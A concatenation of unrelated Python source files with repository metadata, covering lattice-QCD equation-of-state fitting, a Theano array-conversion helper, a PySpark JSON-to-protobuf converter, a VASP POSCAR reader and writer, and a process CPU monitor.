numerator = sum([ai/(tt)**i for i,ai in enumerate(chi_a[quant])])
denominator = sum([bi/(tt)**i for i,bi in enumerate(chi_b[quant])])
c0 = chi_SB[quant]-chi_a[quant][0]/chi_b[quant][0]
return numerator/denominator + c0
########################################################################
# for each susceptibility, get the order of the derivative wrt B,Q,S
########################################################################
BQS = dict(zip(list_chi,[{'B': 0, 'Q': 0, 'S': 0} for i in range(len(list_chi))]))
chi_latex = {'chi0':r'$\chi_0$'}
for chi in list_chi:
# derivatives wrt to each charge
if(chi!='chi0'):
# decompose chiBQS234 in [B,Q,S] and [2,3,4]
chi_match = re.match('chi([A-Z]+)([0-9]+)', chi)
list_charge = list(chi_match.group(1)) # contains the charges
list_der = list(chi_match.group(2)) # contains the derivatives
chi_latex.update({chi:r'$\chi^{'+"".join(list_charge)+'}_{'+"".join(list_der)+'}$'})
for ich,xcharge in enumerate(list_charge):
BQS[chi][xcharge] = int(list_der[ich]) # match each charge to its derivative
chi_latex.update({'chiB2_nS0':r'$c_2$', 'chiB4_nS0':r'$c_4$'})
########################################################################
def param(T,muB,muQ,muS):
"""
Parametrization of thermodynamic quantities from lQCD
as a function of T, \mu_B, \mu_Q, \mu_S
"""
# if input is a single temperature value T
if(isinstance(T,float)):
p = 0.
nB = 0.
nQ = 0.
nS = 0.
s = 0.
e = 0.
if(muB==0. and muQ==0. and muS==0.):
p = param_chi(T,'chi0')
der = scipy.misc.derivative(param_chi,T,dx=1e-5,args=('chi0',))
s = T*der
else:
for chi in list_chi:
i = BQS[chi]['B']
j = BQS[chi]['Q']
k = BQS[chi]['S']
fact = 1./(factorial(i)*factorial(j)*factorial(k))
xchi = param_chi(T,chi)
pow_muB = ((muB/T)**i)
pow_muQ = ((muQ/T)**j)
pow_muS = ((muS/T)**k)
# pressure P/T^4
p += fact*xchi*pow_muB*pow_muQ*pow_muS
# baryon density n_B/T^3 when i > 1
if(i >= 1):
nB += fact*xchi*i*((muB/T)**(i-1.))*pow_muQ*pow_muS
# charge density n_Q/T^3 when i > 1
if(j >= 1):
nQ += fact*xchi*pow_muB*j*((muQ/T)**(j-1.))*pow_muS
# strangeness density n_S/T^3 when k > 1
if(k >= 1):
nS += fact*xchi*pow_muB*pow_muQ*k*((muS/T)**(k-1.))
# derivative of the susceptibility wrt temperature
der = scipy.misc.derivative(param_chi,T,dx=1e-5,args=(chi,))
# s/T^3 = T d(P/T^4)/d(T) + 4 P/T^4
# here we add just the 1st part
s += fact*(T*der-(i+j+k)*xchi)*pow_muB*pow_muQ*pow_muS
# add 2nd piece to s/T^3
s += 4.*p
# energy density e/T^4
e = s-p+(muB/T)*nB+(muQ/T)*nQ+(muS/T)*nS
# if the input is a list of temperature values
elif(isinstance(T,np.ndarray) or isinstance(T,list)):
p = np.zeros_like(T)
s = np.zeros_like(T)
nB = np.zeros_like(T)
nQ = np.zeros_like(T)
nS = np.zeros_like(T)
e = np.zeros_like(T)
for i,xT in enumerate(T):
# see if arrays are also given for chemical potentials
try:
xmuB = muB[i]
except:
xmuB = muB
try:
xmuQ = muQ[i]
except:
xmuQ = muQ
try:
xmuS = muS[i]
except:
xmuS = muS
result = param(xT,xmuB,xmuQ,xmuS)
p[i] = result['P']
s[i] = result['s']
nB[i] = result['n_B']
nQ[i] = result['n_Q']
nS[i] = result['n_S']
e[i] = result['e']
else:
raise Exception('Problem with input')
return {'T': T,'P':p, 's':s, 'n_B':nB, 'n_Q':nQ, 'n_S':nS, 'e':e, 'I':e-3*p}
########################################################################
def param_nS0(T,muB):
"""
Parametrization of thermodynamic quantities from lQCD
as a function of T, \mu_B for the case <n_S>=0 & <n_Q>=0.4<n_B>
"""
# if input is a single temperature value T
if(isinstance(T,float)):
p = 0.
nB = 0.
nQ = 0.
nS = 0.
s = 0.
e = 0.
p = param_chi(T,'chi0')
der = scipy.misc.derivative(param_chi,T,dx=1e-5,args=('chi0',))
s = T*der
if(muB!=0.):
for ichi,chi in enumerate(list_chi_nS0):
i = 2*(ichi+1)
xchi = param_chi(T,chi)
pow_muB = ((muB/T)**i)
# pressure P/T^4
p += xchi*pow_muB
# baryon density n_B/T^3 when i > 1
nB += xchi*i*((muB/T)**(i-1.))
# derivative of the susceptibility wrt temperature
der = scipy.misc.derivative(param_chi,T,dx=1e-5,args=(chi,))
# s/T^3 = T d(P/T^4)/d(T) + 4 P/T^4
# here we add just the 1st part
s += (T*der-(i)*xchi)*pow_muB
# add 2nd piece to s/T^3
s += 4.*p
# energy density e/T^4
e = s-p+(muB/T)*nB
# charge density
nQ = 0.4*nB
# if the input is a list of temperature values
elif(isinstance(T,np.ndarray) or isinstance(T,list)):
p = np.zeros_like(T)
s = np.zeros_like(T)
nB = np.zeros_like(T)
nQ = np.zeros_like(T)
nS = np.zeros_like(T)
e = np.zeros_like(T)
for i,xT in enumerate(T):
# see if arrays are also given for chemical potentials
try:
xmuB = muB[i]
except:
xmuB = muB
result = param_nS0(xT,xmuB)
p[i] = result['P']
s[i] = result['s']
nB[i] = result['n_B']
nQ[i] = result['n_Q']
nS[i] = result['n_S']
e[i] = result['e']
else:
raise Exception('Problem with input')
return {'T': T,'P':p, 's':s, 'n_B':nB, 'n_Q':nQ, 'n_S':nS, 'e':e, 'I':e-3*p}
###############################################################################
# import data from lattice at muB = 0
###############################################################################
# read chi0
WB_EoS0 = pd.read_csv(dir_path+"/data/WB-EoS_muB0_j.physletb.2014.01.007.csv").to_dict(orient='list')
chi_lattice2014 = {'chi0':np.array(list(zip(WB_EoS0['T'],WB_EoS0['P'],WB_EoS0['P_err'])))}
# save all other thermodynamic quantities
for quant in WB_EoS0:
WB_EoS0[quant] = np.array(WB_EoS0[quant])
# read data from 2012 (chiB2,chiQ2,chiS2)
chi_lattice2012 = {}
try:
df = pd.read_csv(dir_path+"/data/WB_chi_T_JHEP01(2012)138.csv").to_dict(orient='list')
for entry in df:
if(entry=='T' or '_err' in entry):
continue
chi_lattice2012.update({entry:np.array(list(zip(df['T'],df[entry],df[entry+'_err'])))})
except:
pass
# read data from 2015 (chiB2,chiB4,chiS2)
chi_lattice2015 = {}
try:
df = pd.read_csv(dir_path+"/data/WB_chi_T_PhysRevD.92.114505.csv").to_dict(orient='list')
for entry in df:
if(entry=='T' or '_err' in entry):
continue
chi_lattice2015.update({entry:np.array([[df['T'][iT],df[entry][iT],df[entry+'_err'][iT]] for iT,_ in enumerate(df[entry]) if np.logical_not(np.isnan(df[entry][iT]))])})
except:
pass
# read data from 2017 (chiB2,chiB4,chiB2) for <nS>=0 & <nQ>=0.4<nB>
chi_lattice2017 = {}
try:
df = pd.read_csv(dir_path+"/data/WB_chi_nS0_T_EPJWebConf.137(2017)07008.csv").to_dict(orient='list')
for entry in df:
if(entry=='T' or '_err' in entry):
continue
chi_lattice2017.update({entry:np.array([[df['T'][iT],df[entry][iT],df[entry+'_err'][iT]] for iT,_ in enumerate(df[entry]) if np.logical_not(np.isnan(df[entry][iT]))])})
except:
pass
# read data from 2018
chi_lattice2018 = {}
try:
df = pd.read_csv(dir_path+"/data/WB_chi_T_JHEP10(2018)205.csv").to_dict(orient='list')
for entry in df:
if(entry=='T' or '_err' in entry):
continue
chi_lattice2018.update({entry:np.array(list(zip(df['T'],df[entry],df[entry+'_err'])))})
except:
pass
# read data from 2020 (chiBQ11,chiBS11,chiQS11)
chi_lattice2020 = {}
try:
df = pd.read_csv(dir_path+"/data/WB_chi_T_PhysRevD.101.034506.csv").to_dict(orient='list')
for entry in df:
if(entry=='T' or '_err' in entry):
continue
chi_lattice2020.update({entry:np.array(list(zip(df['T'],df[entry],df[entry+'_err'])))})
except:
pass
# read data from 2021
WB_EoS_muBoT2021 = {}
try:
df = pd.read_csv(dir_path+"/data/WB-EoS_muBoT_2102.06660.csv").to_dict(orient='list')
for entry in df:
if(entry=='T' or '_err' in entry):
continue
WB_EoS_muBoT2021.update({entry:np.array(list(zip(df['T'],df[entry],df[entry+'_err'])))})
except:
pass
###############################################################################
def EoS_nS0(fun,T,muB,**kwargs):
"""
Calculation of the EoS defined by the input function at (T,muB) with the conditions:
<n_S> = 0
<n_Q> = factQB*<n_B>
"""
factQB = 0.4
if(isinstance(T,float)):
p = 0.
nB = 0.
nQ = 0.
nS = 0.
s = 0.
e = 0.
n = 0.
chi = np.zeros(len(list_chi))
def system(mu):
"""
Define the system to be solved
<n_S> = 0
<n_Q> = factQB * <n_B>
"""
thermo = fun(T,muB,mu[0],mu[1],**kwargs)
return [thermo['n_S']*T**3, thermo['n_Q']*T**3-factQB*thermo['n_B']*T**3]
solution = scipy.optimize.root(system,[-0.08*muB,0.03*muB],method='lm').x
muQ = solution[0]
muS = solution[1]
result = fun(T,muB,muQ,muS,**kwargs)
p = result['P']
s = result['s']
nB = result['n_B']
nQ = factQB*nB
nS = 0.
e = result['e']
# some extra quantities are calculated within HRG function
try:
n = result['n']
chi = result['chi']
except:
pass
elif(isinstance(T,np.ndarray) or isinstance(T,list)):
p = np.zeros_like(T)
s = np.zeros_like(T)
nB = np.zeros_like(T)
nQ = np.zeros_like(T)
nS = np.zeros_like(T)
n = np.zeros_like(T)
e = np.zeros_like(T)
muQ = np.zeros_like(T)
muS = np.zeros_like(T)
chi = np.zeros((len(list_chi),len(T)))
for i,xT in enumerate(T):
# see if arrays are also given for chemical potentials
try:
xmuB = muB[i]
except:
xmuB = muB
result = EoS_nS0(fun,xT,xmuB,**kwargs)
p[i] = result['P']
s[i] = result['s']
nB[i] = result['n_B']
nQ[i] = result['n_Q']
nS[i] = result['n_S']
n[i] = result['n']
e[i] = result['e']
muQ[i] = result['muQ']
muS[i] = result['muS']
chi[:,i] = result['chi']
else:
raise Exception('Problem with input')
return {'T':T, 'muQ': muQ, 'muS': muS, 'P':p, 's':s, 'n_B':nB, 'n_Q':nQ, 'n_S':nS, 'n':n, 'e':e, 'chi':chi, 'I':e-3*p}
| pierre-moreau/EoS_HRG | EoS_HRG/fit_lattice.py | fit_lattice.py | py | 20,400 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser... |
42493659115 | """
Helper function to safely convert an array to a new data type.
"""
from __future__ import absolute_import, print_function, division
import numpy as np
import theano
__docformat__ = "restructuredtext en"
def _asarray(a, dtype, order=None):
"""Convert the input to a Numpy array.
This function is almost identical to ``numpy.asarray``, but it should be
used instead of its numpy counterpart when a data type is provided in
order to perform type conversion if required.
The reason is that ``numpy.asarray`` may not actually update the array's
data type to the user-provided type. For more information see ticket
http://projects.scipy.org/numpy/ticket/870.
In that case, we check that both dtype have the same string
description (byte order, basic type, and number of bytes), and
return a view with the desired dtype.
This function's name starts with a '_' to indicate that it is meant to be
used internally. It is imported so as to be available directly through
theano._asarray
"""
if str(dtype) == 'floatX':
dtype = theano.config.floatX
dtype = np.dtype(dtype) # Convert into dtype object.
rval = np.asarray(a, dtype=dtype, order=order)
# Note that dtype comparison must be done by comparing their `num`
# attribute. One cannot assume that two identical data types are pointers
# towards the same object (e.g. under Windows this appears not to be the
# case).
if rval.dtype.num != dtype.num:
# Type mismatch between the data type we asked for, and the one
# returned by numpy.asarray.
# If both types have the same string description (byte order, basic
# type, and number of bytes), then it is safe to return a view.
if (dtype.str == rval.dtype.str):
# Silent fix.
return rval.view(dtype=dtype)
else:
# Unexpected mismatch: better know what is going on!
raise TypeError(
'numpy.array did not return the data type we '
'asked for (%s %s #%s), instead it returned type '
'%s %s #%s: function '
'theano._asarray may need to be modified to handle this '
'data type.' %
(dtype, dtype.str, dtype.num, rval.dtype, rval.str,
rval.dtype.num))
else:
return rval
| Theano/Theano | theano/misc/safe_asarray.py | safe_asarray.py | py | 2,384 | python | en | code | 9,807 | github-code | 36 | [
{
"api_name": "theano.config",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "numpy.dtype",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 34,
"usage_type": "call"
}
] |
24814387482 | #! /usr/bin/env python
from __future__ import print_function
from pyspark import SparkContext, SparkConf
from pyspark.sql import SparkSession
import Addressbook_pb2
import sys
from google.protobuf import json_format
import json
import glob
import errno
if __name__ == "__main__":
confz = SparkConf()\
.set("spark.hadoop.fs.s3a.endpoint","http://127.0.0.1:9000")\
.set("spark.hadoop.fs.s3a.access.key","minio")\
.set("spark.hadoop.fs.s3a.secret.key","minio123")\
.set("spark.hadoop.fs.s3a.path.style.access","true")\
.set("spark.hadoop.fs.s3a.impl","org.apache.hadoop.fs.s3a.S3AFileSystem")
spark = SparkSession.builder.master("local[3]").appName("Test4").config(conf=confz).getOrCreate()
ndf = spark.read.option("multiline","false").format("json").load("s3a://spark-test/jsontest")
ndf.write.mode("overwrite").format("json").save("/home/yy/fod/jsonfile")
address_book = Addressbook_pb2.AddressBook()
json_dict = {}
files = glob.glob("/home/yy/fod/jsonfile/*.json")
for name in files:
try:
with open(name) as f:
json_dict.update(json.load(f))
except IOError as exc:
if exc.errno != errno.EISDIR:
raise
address_book = json_format.ParseDict(json_dict, Addressbook_pb2.AddressBook())
with open(sys.argv[1], "wb") as f:
f.write(address_book.SerializeToString())
| yiyuan906/ProjectWork | ProtobufTest/SparkConvertFrom.py | SparkConvertFrom.py | py | 1,367 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pyspark.SparkConf",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder.master",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 22,
"usage_type": "attribute"... |
41510394343 | # -*- coding: utf-8 -*-
# project 1
import pandas as pd
import numpy as np
import matplotlib
import warnings
import matplotlib.pyplot as plt
import os
import seaborn as sns
from scipy import stats as st
from scipy.linalg import svd
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.decomposition import PCA
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from scipy.stats import norm
warnings.filterwarnings("ignore", category=matplotlib.MatplotlibDeprecationWarning)
### inspect data ###
# finding NaN or no values
# looking for duplicates
def inspect_data(data):
# check for missing data
print("Is there missing Data?: ", data.isnull().sum().sum())
# check for duplicated data
print("Is there duplicated data?:", data.duplicated().sum())
# count, mean, std, min, 25, 50(median), 75, max
#with open(os.path.join(os.getcwd(), "data_measures.txt"), 'w') as f:
# f.write(data.describe().round(2).to_string())
# calculation of simple summary statistics
stat_df = pd.DataFrame(columns=data.columns, index=(
"mean", "std","var","min", "25%-percentile", "median", "75%-percentile", "max", "std (N-1)", "var (N-1)",
"mode"))
for column in data.columns:
stat_df[column]["mean"] = round(np.mean(data[column]),2)
stat_df[column]["median"] = round(np.median(data[column]),2)
stat_df[column]["min"] = round(np.min(data[column]),2)
stat_df[column]["max"] = round(np.max(data[column]),2)
stat_df[column]["std"] = round(np.std(data[column]),2)
stat_df[column]["std (N-1)"] = round(np.std(data[column], ddof=1),2)
stat_df[column]["var"] = round(np.var(data[column]),2)
stat_df[column]["var (N-1)"] = round(np.var(data[column], ddof=1),2)
stat_df[column]["mode"] = st.mode(data[column])
stat_df[column]["25%-percentile"] = round(np.quantile(data[column], 0.25),2)
stat_df[column]["75%-percentile"] = round(np.quantile(data[column], 0.75),2)
# write summary statistics to file
with open(os.path.join(os.getcwd(), "data_measures.txt"), 'w') as f:
f.write(stat_df.to_string())
# Data Visualisation
def data_visualisation(data):
### plot boxplots/distribution of features ###
plt.figure(figsize=(10, 8))
plt.boxplot((data - data.mean()) / data.std(ddof=1) , labels=data.columns)
plt.title("Boxplots of all Features")
plt.xlabel("Features")
plt.ylabel("Data values")
plt.xticks(rotation=90)
plt.show()
#n_bins = 25
#fig, ax = plt.subplots(2, int(np.ceil(len(data.columns) / 2)))
#plt.figure().set_figheight(10)
#plt.figure().set_figwidth(20)
#fig.tight_layout()
#for col_id in range(len(data.columns)):
# if col_id < int(np.ceil(len(data.columns) / 2)):
# ax[0, col_id].hist(data.iloc[:, col_id], bins=n_bins)
# ax[0, col_id].set_title(data.columns[col_id])
# if col_id >= int(np.ceil(len(data.columns) / 2)):
# ax[1, col_id - int(np.ceil(len(data.columns) / 2))].hist(data.iloc[:, col_id], bins=n_bins)
# ax[1, col_id - int(np.ceil(len(data.columns) / 2))].set_title(data.columns[col_id])
#plt.show()
### plot histogramms ###
# Set up the figure size and grid layout
plt.figure(figsize=(15, 12))
sns.set_style("whitegrid")
# Plot histograms for each column
for i, column in enumerate(data.columns.drop("season"), 1):
plt.subplot(3, 4, i)
sns.histplot(data[column], kde=True)
plt.title(f'Distribution of {column}')
plt.tight_layout()
plt.show()
### plot correlations ###
plt.figure(figsize=(10,8))
sns.heatmap(data.corr(), cmap="RdBu")
plt.xticks(rotation=90)
plt.yticks(rotation=0)
plt.title("Correlation Heat Map")
plt.tight_layout
plt.show()
print(data.corr())
#calculate empirical covariance and derive empirical correlation
cov_mat = np.cov(data, rowvar=False, ddof=1)
print(cov_mat)
cor_mat = np.zeros((data.shape[1],data.shape[1]))
for i in range(data.shape[1]):
for j in range(data.shape[1]):
cor_mat[i][j] = cov_mat[i][j]/(np.std(data.iloc[:,i],ddof=1)*np.std(data.iloc[:,j],ddof=1))
fig, ax = plt.subplots(figsize=(10,8))
sns.heatmap(cor_mat, cmap="RdBu")
plt.xticks(rotation=90)
ax.set_xticklabels(data.columns)
ax.set_yticklabels(data.columns)
plt.yticks(rotation=0)
plt.title("Empirical Correlation Heat Map")
plt.tight_layout
plt.show()
#with open(os.path.join(os.getcwd(), "data_measures.txt"), 'w') as f:
# f.write(data.corr().to_string())
### plot scatter for temperature ###
# Temp - IBH IBT
# Season - Temp vis
fig, ax = plt.subplots(1, 2, figsize=(14, 6))
ax[0].scatter(data["temp"], data["ibh"], color='blue', label='temp vs ibh')
ax[0].set_title('Temperature vs IBH')
ax[0].set_xlabel('Temperature')
ax[0].set_ylabel('IBH')
ax[1].scatter(data["temp"], data["ibt"], color='red', label='temp vs ibt')
ax[1].set_title('Temperature vs IBT')
ax[1].set_xlabel('Temperature')
ax[1].set_ylabel('IBT')
plt.show()
### Mapping season to temperature ####
# Set up the plot
plt.figure(figsize=(10, 6))
colors = ['green', "red", "blue", "orange"]
plt.axhline(y=1, color='grey', linestyle='--', lw=0.5)
for i, row in data.iterrows():
plt.scatter(row['temp'], 1, color=colors[data["season"][i]])
plt.title("Temperature with Season Symbols")
plt.xlabel("Temperature (°C)")
plt.yticks([]) # Hide y-ticks as it's a 1D plot
plt.legend()
plt.grid(True, which='both', linestyle='--', linewidth=0.5, axis='x')
plt.tight_layout()
plt.show()
### Mapping season to temperature and visibility ###
for c in range(4):
# select indices belonging to class c:
class_mask = data["season"] == c
plt.plot(data["temp"][class_mask], data["vis"][class_mask], 'o', alpha=.3)
#plt.legend(data["season"])
plt.legend(["winter", "spring", "summer", "fall"])
#plt.xlabel(data["temp"])
#plt.ylabel(data["vis"])
plt.show()
def pca(data):
### transform data ###
# standardize
data_pca = data.drop(["doy", "season"], axis=1)
mean = data_pca.mean()
std = data_pca.std(ddof=1)
data_pca_scaled = np.asarray((data_pca - mean) / std)
### PCA ###
U, S, V = svd(data_pca_scaled, full_matrices=False)
# Compute variance explained by principal components
rho = (S * S) / (S * S).sum()
threshold = 0.9
### plot explained variance ###
plt.figure()
plt.plot(range(1, len(rho) + 1), rho, 'x-', color='red')
plt.plot(range(1, len(rho) + 1), np.cumsum(rho), 'o-', color='blue')
plt.plot([1,len(rho)],[threshold, threshold],'k--')
plt.title('Variance explained by principal components');
plt.xlabel('Principal component');
plt.ylabel('Variance explained');
plt.legend(['Individual', 'Cumulative', 'Threshold'])
plt.grid()
plt.show()
### transform data onto pca components ###
V_real = V.T
Z = data_pca_scaled @ V_real
### Plot PCA projection ###
# pca component indices
pca_idx = [[0, 1], [1, 4]]
for idx in pca_idx:
plt.figure()
plt.title('Los Angeles Ozone: PCA')
# Z = array(Z)
for c in range(len(sorted(set(data["season"])))):
# select indices belonging to class c:
class_mask = data["season"] == c
plt.plot(Z[class_mask, idx[0]], Z[class_mask, idx[1]], 'o', alpha=.5)
plt.legend(["winter", "spring", "summer", "fall"])
plt.xlabel('PC{0}'.format(idx[0] + 1))
plt.ylabel('PC{0}'.format(idx[1] + 1))
plt.show()
### further analysis of most important pca components ###
# number of pca components to be analysed further
max_pca = 5
# plot matrix scatter pca plot for max_pca components
fig, ax = plt.subplots(max_pca, max_pca, figsize=(20, 10))
plt.suptitle(f'Los Angeles Ozone: PCA for {max_pca} components')
for i in range(max_pca):
for j in range(max_pca):
for c in range(len(sorted(set(data["season"])))):
# select indices belonging to class c:
class_mask = data["season"] == c
ax[i][j].plot(Z[class_mask, i], Z[class_mask, j], 'o', alpha=.5)
ax[i][j].set_xlabel('PC{0}'.format(i + 1))
ax[i][j].set_ylabel('PC{0}'.format(j + 1))
plt.legend(["winter", "spring", "summer", "fall"])
plt.tight_layout()
plt.show()
### plot for pca contribution ###
fig, ax = plt.subplots(figsize=(14, 8))
for i in range(max_pca):
ax.plot(data_pca.columns, V_real[:,i], label=f'Component {i + 1}', marker='o')
for i in range(max_pca):
print(V_real[:,i])
ax.set_xticks(data_pca.columns)
ax.set_xticklabels(data_pca.columns, rotation=45)
ax.set_ylabel('Loading')
ax.set_title('PCA Component Loadings for Each Feature')
ax.grid(True)
plt.show()
### pca heatmap ###
fig, ax = plt.subplots(figsize=(14, 8))
im = ax.imshow(V_real[:,0:max_pca], cmap="RdBu")
ax.legend()
plt.colorbar(im)
ax.set_yticks(np.arange(len(data_pca.columns)), labels=data_pca.columns)
ax.set_xticks(np.arange(max_pca), labels=np.arange(max_pca)+1)
ax.set_ylabel('Feature')
ax.set_xlabel('PCA component')
ax.set_title('PCA Component Loadings for Each Feature')
plt.show()
def main():
### load data ###
data_path = os.path.join(os.getcwd(), "LAozone.csv")
data = pd.read_csv(data_path)
### add additional feature ###
# decoding seasons from doy
# 0 = winter (december, january, february)
# 1 = spring (march, april, may)
# 2 = summer (june, july, august)
# 3 = autumn (september, october, november)
data["season"] = 0
for row in data.index:
if data["doy"][row] <= 60 or data["doy"][row] > 335:
data["season"][row] = 0
if data["doy"][row] > 60 and data["doy"][row] <= 152:
data["season"][row] = 1
if data["doy"][row] > 152 and data["doy"][row] <= 244:
data["season"][row] = 2
if data["doy"][row] > 244 and data["doy"][row] <= 335:
data["season"][row] = 3
inspect_data(data)
data_visualisation(data)
pca(data)
# train the first classifiers
#data_Y = data["season"].copy()
#data_X = data.drop(["doy", "season"], axis=1).copy()
#mean = data_X.mean()
#std = data_X.std(ddof=1)
#data_X = np.asarray((data_X - mean) / std)
#X_train, X_test, y_train, y_test = train_test_split(data_X, data_Y, test_size = 0.2, random_state=5, shuffle=True)
#KNN = KNeighborsClassifier(n_neighbors = 10)
#KNN.fit(X_train, y_train)
#print(KNN.score(X_test,y_test))
#DT = DecisionTreeClassifier()
#DT.fit(X_train,y_train)
#print(DT.score(X_test,y_test))
#RF = RandomForestClassifier()
#RF.fit(X_train,y_train)
#print(RF.score(X_test,y_test))
if __name__ == "__main__":
main()
| tirohweder/into_ml_dm_project_1 | main.py | main.py | py | 11,707 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "matplotlib.MatplotlibDeprecationWarning",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 39,
"usage_type": "call"
},
{
... |
40746622543 | import numpy as np
import gzip
from ase import Atom, Atoms
import gzip
import io
import os
from ase.io import write, read
import pyscal3.formats.ase as ptase
import warnings
def read_snap(infile, compressed = False):
"""
Function to read a POSCAR format.
Parameters
----------
infile : string
name of the input file
compressed : bool, optional
force to read a `gz` zipped file. If the filename ends with `.gz`, use of this keyword is not
necessary, Default False
Returns
-------
atoms : list of `Atom` objects
list of all atoms as created by user input
box : list of list of floats
list of the type `[[xlow, xhigh], [ylow, yhigh], [zlow, zhigh]]` where each of them are the lower
and upper limits of the simulation box in x, y and z directions respectively.
Examples
--------
>>> atoms, box = read_poscar('POSCAR')
>>> atoms, box = read_poscar('POSCAR.gz')
>>> atoms, box = read_poscar('POSCAR.dat', compressed=True)
"""
aseobj = read(infile, format="vasp")
atoms, box = ptase.read_snap(aseobj)
return atoms, box
def write_snap(sys, outfile, comments="pyscal", species=None):
"""
Function to read a POSCAR format.
Parameters
----------
outfile : string
name of the input file
"""
if species is None:
warnings.warn("Using legacy poscar writer, to use ASE backend specify species")
write_poscar(sys, outfile, comments=comments)
else:
aseobj = ptase.convert_snap(sys, species=species)
write(outfile, aseobj, format="vasp")
def split_snaps(**kwargs):
raise NotImplementedError("split method for mdtraj is not implemented")
def convert_snap(**kwargs):
raise NotImplementedError("convert method for mdtraj is not implemented")
def write_poscar(sys, outfile, comments="pyscal"):
"""
Function to read a POSCAR format.
Parameters
----------
outfile : string
name of the input file
"""
#get element strings
if 'species' not in sys.atoms.keys():
sys.atoms["species"] = [None for x in range(sys.atoms.ntotal)]
if sys.atoms.species[0] is None:
if species is None:
raise ValueError("Species was not known! To convert to ase, species need to be provided using the species keyword")
#otherwise we know the species
types = sys.atoms.types
unique_types = np.unique(types)
if not (len(unique_types) == len(species)):
raise ValueError("Length of species and number of types found in system are different. Maybe you specified \"Au\" instead of [\"Au\"]")
#now assign the species to custom
atomspecies = []
for cc, typ in enumerate(types):
atomspecies.append(species[int(typ-1)])
else:
atomspecies = sys.atoms.species
fout = open(outfile, 'w')
fout.write(comments+"\n")
fout.write(" 1.00000000000000\n")
#write box
vecs = sys.box
fout.write(" %1.14f %1.14f %1.14f\n"%(vecs[0][0], vecs[0][1], vecs[0][2]))
fout.write(" %1.14f %1.14f %1.14f\n"%(vecs[1][0], vecs[1][1], vecs[1][2]))
fout.write(" %1.14f %1.14f %1.14f\n"%(vecs[2][0], vecs[2][1], vecs[2][2]))
tt, cc = np.unique(atomspecies, return_counts=True)
atomgroups = [[] for x in range(len(tt))]
for count, t in enumerate(tt):
for ccount, pos in enumerate(sys.atoms.positions):
if atomspecies[ccount] == t:
atomgroups[count].append(pos)
fout.write(" ")
for c in cc:
fout.write("%d "%int(c))
fout.write("\n")
fout.write("Cartesian\n")
for i in range(len(atomgroups)):
for pos in atomgroups[i]:
fout.write(" %1.14f %1.14f %1.14f\n"%(pos[0], pos[1], pos[2]))
fout.close()
| pyscal/pyscal3 | src/pyscal3/formats/vasp.py | vasp.py | py | 3,869 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "ase.io.read",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "pyscal3.formats.ase.read_snap",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "pyscal3.formats.ase",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "warning... |
11686617200 | import psutil
import time
import sys
# Nav : gzserver, move_base, amcl, robo state pub, rosout, mapsrv
# ObjTrack : gzserver, subscribr, objdetector, objtracker, controller
# Nav2D : stage, navigator, operator, mapper, rviz, joy, controller
cpu_util = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
mem_util = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
print(sys.argv)
# t = int(sys.argv[1])
# freq = int(sys.argv[2])
# tim = int(sys.argv[3])
# r = int(sys.argv[5])
sleep_time = 0.4
# n_o = tim/sleep_time
count = 0
def is_illixr_proc(proc) -> bool:
try:
exe = proc.exe()
except psutil.AccessDenied:
exe = ""
return "main.opt.exe" in exe
def is_running():
return any(map(is_illixr_proc, psutil.process_iter()))
def get_cpu_mem_nav2d():
for proc in filter(is_illixr_proc, psutil.process_iter()):
cpu_util[0] += proc.cpu_percent()
ts_arr = []
while not is_running():
time.sleep(0.01)
print("Detected process launch")
while is_running():
get_cpu_mem_nav2d()
count += 1
# print once every 10s i.e. 25*0.4s.
if (count % 25 == 15):
cpu = [x/count for x in cpu_util]
mem = [x/count for x in mem_util]
cms = "###Count: " + str(count) + "Avg CPU: " + str(cpu) + ", Mem: " + str(mem)
print(cms)
ts_arr.append(cms)
time.sleep(sleep_time)
print("ADDED all observations", count)
cpu_txt = ""
mem_txt = ""
for i in range(len(cpu_util)):
cpu_util[i] /= count
cpu_txt += str(cpu_util[i]) + ", "
mem_util[i] /= count
mem_txt += str(mem_util[i]) + ", "
# fname = "%s_cpu_mem.txt"% (sys.argv[4])
f = sys.stdout
# f = open(fname, "w")
for i in sys.argv:
f.write(i + ", ")
for j in ts_arr:
f.write(j)
f.write("\n")
f.write(str(count) + ", ")
f.write(cpu_txt)
f.write(mem_txt)
f.write("\n")
print(sys.argv)
print(cpu_util)
print(mem_util)
'''
if sys.argv[8] == 'yes':
with open('cpu_time_series_%s_%s%s.txt'% (sys.argv[3], sys.argv[4], sys.argv[9]), 'a') as fw:
print "Writing to file for ", sys.argv[3], sys.argv[4], sys.argv[9]
for i in move_base_cpu_arr:
fw.write(str(i) + ', ')
fw.write('\n')
for i in amcl_cpu_arr:
fw.write(str(i) + ', ')
fw.write('\n')
'''
| aditi741997/robotics_project | measure_cpu.py | measure_cpu.py | py | 2,264 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "psutil.AccessDenied",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "psutil.process_iter",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "psutil.pro... |
18626454048 | #
# This library is free software; you can redistribute it and/or
